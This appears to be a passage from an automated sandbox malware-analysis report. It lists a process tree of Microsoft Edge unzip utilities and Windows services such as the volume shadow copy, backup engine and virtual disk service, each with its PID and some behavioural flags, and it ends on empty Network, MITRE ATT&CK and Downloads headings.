          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
          PID:4868
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
          PID:288
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:2152
C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID:1600
C:\Windows\system32\wbengine.exe
  Command line: "C:\Windows\system32\wbengine.exe"
  PID:5776
C:\Windows\System32\vdsldr.exe
  Command line: C:\Windows\System32\vdsldr.exe -Embedding
  PID:5932
C:\Windows\System32\vds.exe
  Command line: C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
  PID:6016
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  PID:5240
Network
MITRE ATT&CK Enterprise v6
Downloads